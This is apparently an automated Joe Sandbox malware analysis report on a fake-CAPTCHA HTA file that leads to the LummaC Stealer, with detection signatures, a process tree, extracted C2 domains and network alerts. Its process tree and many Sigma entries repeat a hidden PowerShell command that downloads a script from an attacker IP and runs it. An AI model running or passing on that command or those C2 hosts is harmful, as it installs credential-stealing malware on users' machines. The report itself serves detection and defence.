Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Captcha.hta

Overview

General Information

Sample name:Captcha.hta
Analysis ID:1573516
MD5:21bd78bbc50aa0b32d6e8d1868e9ad5e
SHA1:8a4278d077fa472fd6e4cbde95e6a3b928eff10b
SHA256:a5a7a72decc3a1f9bb2e0c39269f9660051a3a40c34f87789e33995b9dd2b9e1
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, HTMLPhisher, LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected Cobalt Strike Beacon
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected HtmlPhish44
Yara detected LummaC Stealer
Yara detected obfuscated html page
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious MSHTA Child Process
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 7156 cmdline: mshta.exe "C:\Users\user\Desktop\Captcha.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 3616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 6632 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • csc.exe (PID: 6352 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 1104 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3BAA.tmp" "c:\Users\user\AppData\Local\Temp\mvgjodmb\CSC1DCFE1A1CB594C5687CEBA7BEDB98DA4.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • RegAsm.exe (PID: 7184 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • svchost.exe (PID: 1908 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["dare-curbys.biz", "zinc-sneark.biz", "dwell-exclaim.biz", "se-blurry.biz", "print-vexer.biz", "covery-mover.biz", "formy-spill.biz", "impend-differ.biz"], "Build id": "DUkgLv--otdel"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Captcha.htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    Captcha.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security

      PCAP (Network Traffic)

      SourceRuleDescriptionAuthorStrings
      sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          Process Memory Space: powershell.exe PID: 3616JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            Process Memory Space: powershell.exe PID: 3616INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0x973:$b2: ::FromBase64String(
            • 0x9a7:$b2: ::FromBase64String(
            • 0x9db:$b2: ::FromBase64String(
            • 0x1c71b:$b2: ::FromBase64String(
            • 0x1c74f:$b2: ::FromBase64String(
            • 0x1c783:$b2: ::FromBase64String(
            • 0x704d5:$b2: ::FromBase64String(
            • 0x70509:$b2: ::FromBase64String(
            • 0x7053d:$b2: ::FromBase64String(
            • 0x8d70e:$b2: ::FromBase64String(
            • 0x8d742:$b2: ::FromBase64String(
            • 0x8d776:$b2: ::FromBase64String(
            • 0xf1535:$b2: ::FromBase64String(
            • 0xf1569:$b2: ::FromBase64String(
            • 0xf159d:$b2: ::FromBase64String(
            • 0x1ad520:$b2: ::FromBase64String(
            • 0x1ad554:$b2: ::FromBase64String(
            • 0x1ad588:$b2: ::FromBase64String(
            • 0xfe4b:$s1: -join
            • 0x10602:$s1: -join
            • 0x9be1f:$s1: -join
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: PowerShell Download and Execution Cradles
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Captcha.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7156, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", ProcessId: 3616, ProcessName: powershell.exe
              Sigma detected: Suspicious MSHTA Child Process
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Captcha.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7156, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", ProcessId: 3616, ProcessName: powershell.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Captcha.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7156, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", ProcessId: 3616, ProcessName: powershell.exe
              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3616, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline", ProcessId: 6632, ProcessName: csc.exe
              Sigma detected: PowerShell Web Download
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Captcha.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7156, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", ProcessId: 3616, ProcessName: powershell.exe
              Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Captcha.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7156, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", ProcessId: 3616, ProcessName: powershell.exe
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Captcha.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7156, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", ProcessId: 3616, ProcessName: powershell.exe
              Sigma detected: Dynamic CSharp Compile Artefact
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3616, TargetFilename: C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Captcha.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7156, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", ProcessId: 3616, ProcessName: powershell.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1908, ProcessName: svchost.exe

              Data Obfuscation

              barindex
              Sigma detected: Dot net compiler compiles file from suspicious location
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3616, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline", ProcessId: 6632, ProcessName: csc.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-12T07:52:13.534646+010020283713Unknown Traffic192.168.2.449737172.67.206.64443TCP
              2024-12-12T07:52:16.055149+010020283713Unknown Traffic192.168.2.449738172.67.206.64443TCP
              2024-12-12T07:52:18.227210+010020283713Unknown Traffic192.168.2.449739172.67.206.64443TCP
              2024-12-12T07:52:20.349759+010020283713Unknown Traffic192.168.2.449740172.67.206.64443TCP
              2024-12-12T07:52:22.415356+010020283713Unknown Traffic192.168.2.449742172.67.206.64443TCP
              2024-12-12T07:52:25.613617+010020283713Unknown Traffic192.168.2.449746172.67.206.64443TCP
              2024-12-12T07:52:28.579229+010020283713Unknown Traffic192.168.2.449748172.67.206.64443TCP
              2024-12-12T07:52:33.452236+010020283713Unknown Traffic192.168.2.449750172.67.206.64443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-12T07:52:14.256631+010020546531A Network Trojan was detected192.168.2.449737172.67.206.64443TCP
              2024-12-12T07:52:16.781738+010020546531A Network Trojan was detected192.168.2.449738172.67.206.64443TCP
              2024-12-12T07:52:34.269240+010020546531A Network Trojan was detected192.168.2.449750172.67.206.64443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-12T07:52:14.256631+010020498361A Network Trojan was detected192.168.2.449737172.67.206.64443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-12T07:52:16.781738+010020498121A Network Trojan was detected192.168.2.449738172.67.206.64443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-12T07:52:13.534646+010020579741Domain Observed Used for C2 Detected192.168.2.449737172.67.206.64443TCP
              2024-12-12T07:52:16.055149+010020579741Domain Observed Used for C2 Detected192.168.2.449738172.67.206.64443TCP
              2024-12-12T07:52:18.227210+010020579741Domain Observed Used for C2 Detected192.168.2.449739172.67.206.64443TCP
              2024-12-12T07:52:20.349759+010020579741Domain Observed Used for C2 Detected192.168.2.449740172.67.206.64443TCP
              2024-12-12T07:52:22.415356+010020579741Domain Observed Used for C2 Detected192.168.2.449742172.67.206.64443TCP
              2024-12-12T07:52:25.613617+010020579741Domain Observed Used for C2 Detected192.168.2.449746172.67.206.64443TCP
              2024-12-12T07:52:28.579229+010020579741Domain Observed Used for C2 Detected192.168.2.449748172.67.206.64443TCP
              2024-12-12T07:52:33.452236+010020579741Domain Observed Used for C2 Detected192.168.2.449750172.67.206.64443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-12T07:52:07.811536+010020197142Potentially Bad Traffic192.168.2.449734147.45.44.13180TCP
              2024-12-12T07:52:08.708627+010020197142Potentially Bad Traffic192.168.2.449734147.45.44.13180TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-12T07:52:11.967953+010020579731Domain Observed Used for C2 Detected192.168.2.4589541.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-12T07:52:11.432886+010020579791Domain Observed Used for C2 Detected192.168.2.4588361.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-12T07:52:11.676415+010020579771Domain Observed Used for C2 Detected192.168.2.4606201.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-12T07:52:11.188817+010020579831Domain Observed Used for C2 Detected192.168.2.4653611.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-12T07:52:10.958689+010020579811Domain Observed Used for C2 Detected192.168.2.4541231.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-12T07:52:19.083711+010020480941Malware Command and Control Activity Detected192.168.2.449739172.67.206.64443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-12T07:52:28.593209+010028438641A Network Trojan was detected192.168.2.449748172.67.206.64443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: covery-mover.bizURL Reputation: Label: malware
              Source: zinc-sneark.bizURL Reputation: Label: malware
              Source: dwell-exclaim.bizURL Reputation: Label: malware
              Source: formy-spill.bizURL Reputation: Label: malware
              Source: https://covery-mover.biz:443/apiAvira URL Cloud: Label: malware
              Source: https://covery-mover.biz/apiaAvira URL Cloud: Label: malware
              Source: https://covery-mover.biz/apidAvira URL Cloud: Label: malware
              Source: https://covery-mover.biz/Avira URL Cloud: Label: malware
              Source: https://covery-mover.biz/apie.Avira URL Cloud: Label: malware
              Source: https://covery-mover.biz/DAvira URL Cloud: Label: malware
              Source: https://covery-mover.biz/apiAvira URL Cloud: Label: malware
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.dllAvira: detection malicious, Label: HEUR/AGEN.1300034
              Found malware configuration
              Source: 7.2.RegAsm.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["dare-curbys.biz", "zinc-sneark.biz", "dwell-exclaim.biz", "se-blurry.biz", "print-vexer.biz", "covery-mover.biz", "formy-spill.biz", "impend-differ.biz"], "Build id": "DUkgLv--otdel"}
              Multi AV Scanner detection for submitted file
              Source: Captcha.htaReversingLabs: Detection: 13%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.dllJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: impend-differ.biz
              Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: print-vexer.biz
              Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: dare-curbys.biz
              Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: covery-mover.biz
              Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: formy-spill.biz
              Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: dwell-exclaim.biz
              Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: zinc-sneark.biz
              Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: se-blurry.biz
              Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: zinc-sneark.biz
              Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: DUkgLv--otdel
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00416B7E CryptUnprotectData,7_2_00416B7E

              Phishing

              barindex
              Yara detected HtmlPhish44
              Source: Yara matchFile source: Captcha.hta, type: SAMPLE
              Yara detected obfuscated html page
              Source: Yara matchFile source: Captcha.hta, type: SAMPLE
              Source: unknownHTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.4:49750 version: TLS 1.2
              Source: Binary string: Automation.pdb source: powershell.exe, 00000001.00000002.1793256406.00000000084AC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: $dq7C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.pdbx source: powershell.exe, 00000001.00000002.1781632412.0000000005BFD000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.1779801283.0000000003128000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: $dq7C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.pdb source: powershell.exe, 00000001.00000002.1781632412.0000000005651000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: System.Managem..Automation.pdb source: powershell.exe, 00000001.00000002.1793256406.00000000084AC000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\AdobeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolderJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior
